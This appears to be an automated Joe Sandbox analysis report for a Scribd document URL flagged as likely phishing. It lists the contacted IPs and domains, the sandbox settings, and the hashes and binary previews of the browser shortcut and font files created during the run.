                                                                                                                                                                                                                                                                                                                                                                                        151.101.120.157
                                                                                                                                                                                                                                                                                                                                                                                        platform.twitter.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.194.217
                                                                                                                                                                                                                                                                                                                                                                                        browser.sentry-cdn.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        13.226.2.62
                                                                                                                                                                                                                                                                                                                                                                                        live.rezync.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                        172.217.21.36
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        142.250.181.66
                                                                                                                                                                                                                                                                                                                                                                                        td.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        157.240.195.35
                                                                                                                                                                                                                                                                                                                                                                                        star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        216.137.52.111
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        8014BATELNETBSfalse
                                                                                                                                                                                                                                                                                                                                                                                        70.42.32.95
                                                                                                                                                                                                                                                                                                                                                                                        nydc1.outbrain.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                                        22075AS-OUTBRAINUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        89.35.237.170
                                                                                                                                                                                                                                                                                                                                                                                        prdsurvey.b-cdn.netRomania
                                                                                                                                                                                                                                                                                                                                                                                        34304TEENTELECOMROfalse
                                                                                                                                                                                                                                                                                                                                                                                        178.250.1.9
                                                                                                                                                                                                                                                                                                                                                                                        widget.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                                                                                                                                                                                        44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                                                                                                                                                                                        104.17.24.14
                                                                                                                                                                                                                                                                                                                                                                                        cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        172.67.157.98
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                                        reddit.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        35.186.224.24
                                                                                                                                                                                                                                                                                                                                                                                        edge-web.dual-gslb.spotify.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        142.250.181.100
                                                                                                                                                                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                                        ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.2.137
                                                                                                                                                                                                                                                                                                                                                                                        code.jquery.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        104.18.11.207
                                                                                                                                                                                                                                                                                                                                                                                        stackpath.bootstrapcdn.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.2.217
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        dexeqbeb7giwr.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                                                                        8014BATELNETBSfalse
                                                                                                                                                                                                                                                                                                                                                                                        35.186.249.72
                                                                                                                                                                                                                                                                                                                                                                                        utt.impactcdn.comUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        35.244.142.80
                                                                                                                                                                                                                                                                                                                                                                                        cdn.pdst.fmUnited States
                                                                                                                                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                                                                                                                                                        192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                        Analysis ID:1570408
                                                                                                                                                                                                                                                                                                                                                                                        Start date and time:2024-12-06 22:58:37 +01:00
                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                        Overall analysis duration:0h 4m 9s
                                                                                                                                                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                                                                                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                                                                                                                                                                        Sample URL:https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed
                                                                                                                                                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:14
                                                                                                                                                                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                        Classification:mal68.phis.win@26/272@224/71
                                                                                                                                                                                                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.162.84, 172.217.17.46, 142.250.181.136, 142.250.181.106, 142.250.181.138, 172.217.17.42, 142.250.181.74, 172.217.19.202, 216.58.208.234, 172.217.21.42, 172.217.19.170, 172.217.19.234, 172.217.17.74, 2.20.68.99, 2.20.68.88, 2.20.68.80, 2.20.68.84, 2.20.68.89, 2.20.68.85, 2.20.68.83, 142.250.181.78, 13.107.6.156, 40.126.53.11, 40.126.53.10, 20.190.181.5, 20.231.128.67, 20.190.181.6, 40.126.53.13, 20.190.181.2, 40.126.53.18, 172.217.17.67, 142.250.181.10
                                                                                                                                                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, clients2.google.com, redirector.gvt1.com, www.googletagmanager.com, bat.bing.com, update.googleapis.com, analytics.tiktok.com.edgekey.net, login.mso.msidentity.com, www.google-analytics.com, clients1.google.com, www.tm.ak.prd.aadg.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, e35058.a.akamaiedge.net, b-0004.b-msedge.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, xandr-g-geo.trafficmanager.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
                                                                                                                                                                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                        • VT rate limit hit for: https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed
                                                                                                                                                                                                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 20:59:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2673
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9901765133715354
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8pd5Th1zwHiidAKZdA1FehwiZUklqehBy+3:8dbztey
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B4D07635780AF7FA408C3178066F32AB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D026613BDE4B0DBF475848096930C9755DAED6A2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:329B2F8F7C353638245AE4DCA1468B7C7708502ABCDB3D8F42C201BC23159F5E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8DD0CF49EC07F6DE3FB087ED391596611A87FCB3A9A5E6216FADB57293EEEA0C2A45EC7EEDBF15818048F2AF515C0AC3C754777B7E8510F7280F66D187AC2C97
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....8..*H..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yg............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 20:59:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2675
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.005365489561569
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8S2d5Th1zwHiidAKZdA1seh/iZUkAQkqehOy+2:8XbzD9Qny
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8D32633BBBEF5A53557AC22A603D3901
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:02CD49555E299BEE60FBE99733F510ADE0040439
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FA8294E2D93EAE6170CC23F6E0F6910C5D835574D771B72A7FF25D2FEC9D2D33
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0CB83C2DFC9BBEF6D90C63C5F07774B154281A03C3550ED0D186EA24AB4FAB9C062378B0706A72D0C74EDCCBF60E045B4503EEDB45B1175861078823F82AB21E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....:...*H..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yg............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2689
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.0147205485091915
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8+d5Th1AHiidAKZdA14meh7sFiZUkmgqeh7scy+BX:88bnnay
                                                                                                                                                                                                                                                                                                                                                                                        MD5:000A3C80262B52A7508FC9FE9B6FA9D3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:926E768D7048E8E89ECA190293916451E504E1E1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:54C1D32A03497F61E68304C173A8CE91970205EC352F1973E28528B261F74EE7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6A653209607D8998482BA2F50AC413AD2CC67D9532245431056AEF541DD38CED1250371416B1ED2F3476E6712EF157776EA3FF30A93149C6220DFB02C5B3D098
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 20:59:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.004547150591711
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8td5Th1zwHiidAKZdA1TehDiZUkwqehCy+R:8ZbzwEy
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F3F25BBDEA1056DB7CF550C2774CDE66
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DD3E2A40AE03E8FB29F4D087F47B017AD90E74CF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:82CEF46906B0A51B1DAF78C20A7FB8668016450E409DD5A517B83A8CF9F4EF0D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:346100AC701A95E89AE7632B3FFE6E80C61535A2E21D399DCBBA2FCE6C4BD78FC56A66B317F6E454F664FB74076856B6075883996A8F3DB790B6CB9F9A5CB70A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....M...*H..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yg............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 20:59:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9900593644094733
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8dd5Th1zwHiidAKZdA1dehBiZUk1W1qehoy+C:8pbzQ9Iy
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BB1ED4886D963E1B0488DFD577A1514A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A447227BA856008D47DA4B8DE3822E325289939D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E41B7A71AF4A4210E10DCDC1109C969E7B7B9E797417ED2A00FC0D866B0F8474
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:11E221AF056F07F4A686610F69C80B0C190B73B19BDDCA6F414AFC89AE6D7729BF44853148FB578457E3890FB33D55CC44658B3CAB6DD042C182AB0F07E8CB7A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....#...*H..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yg............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 6 20:59:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.0018764413352566
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8yd5Th1zwHiidAKZdA1duTeehOuTbbiZUk5OjqehOuTbay+yT+:8IbzCTfTbxWOvTbay7T
                                                                                                                                                                                                                                                                                                                                                                                        MD5:0C665450F732D5278C03E4F6FACE9BCB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C929976A1F25AF1A5D75919197FA0F8ECCB0329E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:81EDF5557F79C5E24E585D6435BF6CA8695C8EA6907CAA134EA659018960EB03
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2C63C71EC4648A98A5FBA942873EEF7B4BFF2A63799C962EE0D293BD93B39B309078733706AE38B7AC29B09B5005A4517741F03417F676E54B88C944B2586F3F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....N)..*H..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yf.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yf.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yf............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yg............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, was "0000.woff2", last modified: Fri Dec 6 14:56:32 2024, from Unix, original size modulo 2^32 1932
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1966
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.846545095156066
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:X4eg0C5Hc3yWLqYg9QyyHV6as2KO+cI8nRkJz:Ie/C58CWLpYQrwas2KO+d8iJz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3207190E0EAC228DB9E3C7FA8674B9FB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:52E0D163EB63644D94578E113F464A170EB0B6EE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A3D79A764C3FD191852D6CD3C8EF13B807330D5BA26ADEAF5B27DFF61A644B68
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D908485B839CC9DCDA52E3B6DB6AB7E62C6C7D9F5C5C710F589E4D6495B5D97D8E09DE7803EE5D9DFB533E1EB29E4FBB09C6652BD7E31FE7A4668A09E300F1CD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://html.scribdassets.com/975ow02iyodmurb1/fonts/0000.woff2
